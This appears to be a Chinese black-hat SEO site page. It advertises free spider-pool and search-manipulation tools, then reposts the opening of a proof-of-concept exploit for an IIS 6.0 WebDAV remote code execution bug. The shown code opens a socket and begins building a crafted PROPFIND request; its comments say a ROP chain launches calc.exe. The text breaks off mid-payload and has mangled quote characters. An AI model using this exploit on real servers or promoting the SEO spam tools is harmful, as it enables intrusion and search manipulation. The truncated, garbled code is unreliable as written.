黑帽SEO
免费发布泛目录 蜘蛛池 黑帽SEO工具

iisS 6.0 远程代码执行0day

  PoC(来源网络github.com/edwardz246003/IIS_exploit/blob/master/exploit.py)

  #————Our payload set up a ROP chain by using the overflow 3 times. It will launch a calc.exe which shows the bug is really dangerous. #written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China #———–Email: edwardz@foxmail.com import socket sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((‘127.0.0.1′,80)) pay=’PROPFIND / HTTP/1.1/r/nHost: localhost/r/nContent-Length: 0/r/n’ pay+=’If: